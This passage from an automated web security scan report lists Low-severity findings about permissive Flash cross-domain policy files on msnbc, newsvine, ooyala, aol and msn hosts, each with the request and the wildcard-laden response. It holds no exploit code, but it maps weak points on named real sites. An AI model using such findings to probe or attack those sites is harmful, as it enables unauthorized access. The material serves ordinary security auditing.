   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.49. http://hardball.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hardball.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: hardball.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:08:22 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.50. http://helenaspopkin.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://helenaspopkin.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: helenaspopkin.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:18 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=994
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.51. http://info.ooyala.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://info.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.1
Host: info.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:39:14 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 14:51:39 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=3600, public
Connection: close
Content-Type: text/x-cross-domain-policy
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

6.52. http://ingame.msnbc.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ingame.msnbc.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ingame.msnbc.redacted

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:52 GMT
ETag: "20b4005-191-492fdc7203300"
Accept-Ranges: bytes
Content-Length: 401
Content-Type: text/xml
Date: Sun, 30 Jan 2011 02:08:29 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.53. http://ingame.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ingame.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ingame.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:07:25 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=952
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.54. http://jp.video.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://jp.video.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: jp.video.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 530
Content-Type: text/xml
Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT
Accept-Ranges: bytes
ETag: "01042b01256ca1:1892"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:08 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.redacted" />
<allow-access-from domain="sand.msn-int.com" />
<allow-access-from domain="*.nineredacted.au" />
<allow-access-from domain="*.bing.com" />
<allow-access-from domain="*.playredacted" />
<allow-access-from domain="*.video.s-redacted" />
<allow-access-from domain="articles.moneycentral.alpha.msn-int.com" />
...[SNIP]...

6.55. http://l.player.ooyala.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://l.player.ooyala.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sun, 30 Jan 2011 12:49:02 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Cache-Control: max-age=3600, private
Content-Length: 330

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*.ooyala.com" />
...[SNIP]...

6.56. http://latino.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://latino.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: latino.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:10 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...

6.57. http://latino.video.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://latino.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: latino.video.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 530
Content-Type: text/xml
Last-Modified: Mon, 26 Oct 2009 08:02:40 GMT
Accept-Ranges: bytes
ETag: "01042b01256ca1:179a"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:09:11 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.redacted" />
<allow-access-from domain="sand.msn-int.com" />
<allow-access-from domain="*.nineredacted.au" />
<allow-access-from domain="*.bing.com" />
<allow-access-from domain="*.playredacted" />
<allow-access-from domain="*.video.s-redacted" />
<allow-access-from domain="articles.moneycentral.alpha.msn-int.com" />
...[SNIP]...

6.58. http://live.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://live.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: live.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:24 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=993
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.59. http://michaelwann.newsvine.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://michaelwann.newsvine.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: michaelwann.newsvine.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:08:31 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Tue, 19 Oct 2010 20:02:49 GMT
ETag: "d5c01d-191-492fdc6f26c40"
Accept-Ranges: bytes
Content-Length: 401
Keep-Alive: timeout=3, max=976
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.newsvine.com" />
<allow-access-from domain="*.redacted" />
<allow-access-from domain="*.msnbc.com" />
<allow-access-from domain="*.fluid.nl" />
<allow-access-from domain="64.207.156.207" />
...[SNIP]...

6.60. http://money.aol.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://money.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: money.aol.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 221
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*.aolcdn.com" />
   <allow-access-from domain="*.test.aol.com" />
<
...[SNIP]...

6.61. http://msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:23 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.redcated"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.redacted" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.62. http://msnbcmedia.redacted/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://msnbcmedia.redacted
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: msnbcmedia.redacted

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:16:31 GMT
Last-Modified: Thu, 27 Jan 2011 21:27:54 GMT
Content-Type: text/xml
ETag: "0e9d6e69becb1:484"
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Content-Length: 1021
Connection: close

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="*.msnbc.com" />
   <allow-access-from domain="*.redacted" />
   <allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="*.fluid.nl" />
   <allow-access-from domain="64.207.156.207" />
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="*.s-redacted" />
   <allow-access-from domain="*.telemundo.com" />
   <allow-access-from domain="*.pulse360.com" />
   <allow-access-from domain="*.context3.kanoodle.com" />
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
...[SNIP]...

6.63. http://mtp.msnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mtp.msnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mtp.msnbc.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Jan 2011 07:21:39 GMT
Accept-Ranges: bytes
ETag: "80c394d6f2bdcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:16:52 GMT
Connection: close
Content-Length: 3744

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
